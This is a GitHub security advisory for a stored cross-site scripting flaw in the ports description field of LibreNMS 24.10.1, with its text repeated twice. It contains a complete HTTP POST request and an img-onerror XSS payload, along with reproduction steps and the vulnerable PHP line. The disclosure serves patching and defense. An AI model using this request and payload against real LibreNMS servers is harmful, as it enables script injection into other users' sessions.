Headline
GHSA-27vf-3g4f-6jp7: LibreNMS Ports Stored Cross-site Scripting vulnerability
StoredXSS-LibreNMS-Ports
Description:
Stored XSS on the parameter:
/ajax_form.php -> param: descr
Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>
type=update-ifalias&descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E&ifName=lo&port_id=1&device_id=1
of Librenms version 24.10.1 (https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.
Proof of Concept:
- Add a new device through the LibreNMS interface.
- Edit the newly created device and select the “ports” section.
- In the “Description” field, enter the following payload:
"><img src onerror="alert(1)">. - Save the changes.
- The XSS vulnerability is triggered when accessing the “ports” tab, and the payload is executed again when hovering over the modified value in the “Port” field.
Payload:
Executes:
The script execution vulnerability in the description field, as shown in the image, occurs at Line 63 of functions.inc.php
$overlib_content = '<div class=overlib><span class=overlib-text>' . $text . '</span><br />';
Impact:
Execution of Malicious Code
- GitHub Advisory Database
- GitHub Reviewed
- GHSA-27vf-3g4f-6jp7
LibreNMS Ports Stored Cross-site Scripting vulnerability
Moderate severity GitHub Reviewed Published Jan 16, 2025 in librenms/librenms • Updated Jan 16, 2025
Package
composer librenms/librenms (Composer)
Affected versions
< 24.10.1
StoredXSS-LibreNMS-Ports
Description:
Stored XSS on the parameter:
/ajax_form.php -> param: descr
Request:
POST /ajax_form.php HTTP/1.1 Host: <your_host> X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: <your_XSRF_token> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: <your_cookie>
type=update-ifalias&descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E&ifName=lo&port_id=1&device_id=1
of Librenms version 24.10.1 (https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.
Proof of Concept:
- Add a new device through the LibreNMS interface.
- Edit the newly created device and select the “ports” section.
- In the “Description” field, enter the following payload: "><img src onerror="alert(1)">.
- Save the changes.
- The XSS vulnerability is triggered when accessing the “ports” tab, and the payload is executed again when hovering over the modified value in the “Port” field.
Payload:
Executes:
The script execution vulnerability in the description field, as shown in the image, occurs at Line 63 of functions.inc.php
$overlib_content = ‘<div class=overlib><span class=overlib-text>’ . $text . '</span><br />’;
Impact:
Execution of Malicious Code
References
- GHSA-27vf-3g4f-6jp7
- librenms/librenms#16721
- librenms/librenms@9d07d16
Published to the GitHub Advisory Database
Jan 16, 2025
Last updated
Jan 16, 2025